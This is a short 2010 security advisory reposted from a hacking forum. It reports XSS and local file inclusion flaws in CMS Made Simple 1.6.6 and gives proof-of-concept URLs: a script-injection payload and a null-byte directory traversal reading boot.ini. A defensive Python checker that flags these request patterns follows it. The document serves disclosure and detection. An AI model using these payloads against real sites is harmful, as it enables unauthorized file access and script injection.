SECURITYVULNS:DOC:23232
Feb 16, 2010 - 12:00 a.m.

cmsmadesimple Multiple Security Issues: XSS + LFI

################################################################

est.2007 \/ \/ forum.darkc0de.com

################################################################

Greetz to all Darkc0de, AI, ICW, AH Members

Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit,

Author: Beenu Arora

Home : www.BeenuArora.com

Email : [email protected]

Share the c0de!

################################################################

Exploit: Multiple Vulnerabilities in cmsmadesimple

AppSite: http://www.cmsmadesimple.com/

Tested Version : 1.6.6

XSS

POC:-http://localhost/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>

Multiple Local File Inclusion

Sample URL:

POC:-http://localhost:80/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c…%5c…%5c%5c…%5c…%5c%5c…%5c…%5c%5c…%5c…%5c%5c…%5c…%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39

################################################################
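
A defender-side check for the two request patterns shown above, as an added example that is not part of the original advisory: it flags `mact` values carrying path characters or a NUL byte and `showtemplate` values other than `true`/`false`. The four-part `module,id,action,inline` layout of `mact`, the allowed `showtemplate` values, the `detail` action name and the sample URLs are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: a legitimate mact value is "module,id,action,inline" and every
# part is a plain identifier; anything else is reported.
SAFE_PART = re.compile(r"[A-Za-z0-9_]+")
# Assumption: these parameters only ever carry "true" or "false".
BOOL_PARAMS = ("showtemplate", "cntnt01showtemplate")

def check_request(url):
    """Return a list of findings for one request URL (empty list = clean)."""
    findings = []
    # parse_qsl percent-decodes once: %2c -> ",", %5c -> "\", %00 -> NUL.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name == "mact":
            parts = value.split(",")
            if "\x00" in value:
                findings.append("mact: NUL byte")
            if ".." in value or "\\" in value or "/" in value:
                findings.append("mact: path characters")
            if len(parts) != 4 or not all(SAFE_PART.fullmatch(p) for p in parts):
                findings.append("mact: not module,id,action,inline")
        elif name in BOOL_PARAMS and value not in ("true", "false"):
            findings.append(f"{name}: unexpected value")
    return findings

# Constructed request URLs (not captured traffic): one normal News request,
# one showtemplate value with trailing markup, one mact with path characters.
SAMPLES = [
    "/index.php?mact=News%2ccntnt01%2cdetail%2c0&cntnt01articleid=1"
    "&cntnt01showtemplate=false&cntnt01returnid=39",
    "/index.php?page=tags-in-the-core&showtemplate=false%22%3E%3Cscript%3E",
    "/index.php?mact=News%2ccntnt01%2c..%5c..%5cboot.ini%00%2c0&cntnt01articleid=1",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(check_request(url) or "clean", "<-", url)
```

The check decodes each parameter once, so it suits log review or a request filter placed where the application sees the same single-decoded value.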